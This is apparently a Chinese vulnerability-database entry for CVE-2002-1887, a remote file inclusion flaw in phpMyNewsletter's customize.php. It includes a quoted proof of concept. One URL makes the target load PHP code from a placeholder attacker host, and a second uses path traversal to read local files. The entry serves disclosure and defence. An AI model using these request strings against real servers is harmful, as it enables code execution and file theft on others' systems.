phpMyNewsLetter远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107022 漏洞类型 配置错误
发布时间 2002-10-03 更新时间 2006-09-28
CVE编号 CVE-2002-1887 CNNVD-ID CNNVD-200212-651
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21905
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-651
|漏洞详情
phpMyNewsletter0.6.10版本的customize.php的PHP远程文件包含漏洞。远程攻击者借助l参数执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/5886/info

A vulnerability has been discovered in phpMyNewsLetter.

Reportedly, it is possible to pass an attacker-specified file include location to a CGI paramter of the 'customize.php' script. 

This may allow an attacker to execute arbitrary commands with the privileges of the webserver.

Additionally, an attacker may exploit this problem to view local webserver readable files.

http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view
|参考资料

来源:XF
名称:phpmynewsletter-customize-file-include(10288)
链接:http://www.iss.net/security_center/static/10288.php
来源:BUGTRAQ
名称:20021003phpMyNewsletter
链接:http://archives.neohapsis.com/archives/bugtraq/2002-10/0060.html
来源:BID
名称:5886
链接:http://www.securityfocus.com/bid/5886
来源:SECUNIA
名称:7220
链接:http://secunia.com/advisories/7220